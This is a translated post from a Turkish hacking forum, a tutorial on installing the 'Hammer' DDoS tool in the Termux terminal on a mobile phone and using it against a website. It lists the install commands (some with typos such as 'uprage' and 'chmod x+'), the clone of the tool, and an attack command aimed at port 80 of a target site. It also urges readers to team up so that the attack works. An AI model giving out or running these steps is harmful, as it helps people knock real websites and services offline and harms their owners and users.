How to Install and Use Termux Hammer DDOS Tool

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Kullanıcı1233

Kıdemli Üye
19 Tem 2011
Hello everyone

Today I'm going to show you how to install and use Termux DDOS tool.

NL39rO.jpg

What is DDOS Tool?

DDOS attack is a malicious attempt to disrupt normal traffic of a targeted server, service or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. So you can attack target system's bandwith or resources with ddos ​​tool.

What is the logic behind DDOS Attack?

Well there are some advantages for DDos attackers and this is the reason why they choose DDos attack. First and most important of these is that machines can generate more attack traffic than one machine. Attack machines imitate each other in attacks from many machines. So the attack is growing and spreading. There are 4 different DDOS attack methods in the world: Tcp syn flood, volumetric ddos attack, IP fragmentation attack, application layer attacks. They are different methods but the result is same.

Can I attack from mobile devices?

Yes, you can attack with termux terminal.

Can I do it alone?

Yes you can do it alone but it won't work. But If you do it with 10 people, probably it will work.

Setup:

Firstly, enter this code on the command line:

pkg update

pkg uprage

pkg install python --> We are installing python with this command.

pkg install git --> We are installing Git with this command. (By the way Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency.)

git clone https//www.github.com/cyweb/hammer
(well, we are installing hammer with this command. Hammer is our ddos tool.)

cd hammer

ls

using these codes, we make sure that we installed.

chmod x+ hammer.py

(we are giving permission to run)

ls

and with this command, we are controlling again.

ls

If you see this, everything is ready.

DOE86O.jpg

finally, we are starting attack with this command.

python hammer.py -s www.siteveyaıpadresi.com -p 80 -t 135

I hope this will help.

source: https://www.turkhackteam.org/google...os-araci-kurulumu-ve-saldirisi-realystar.html

Translator: dRose98

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.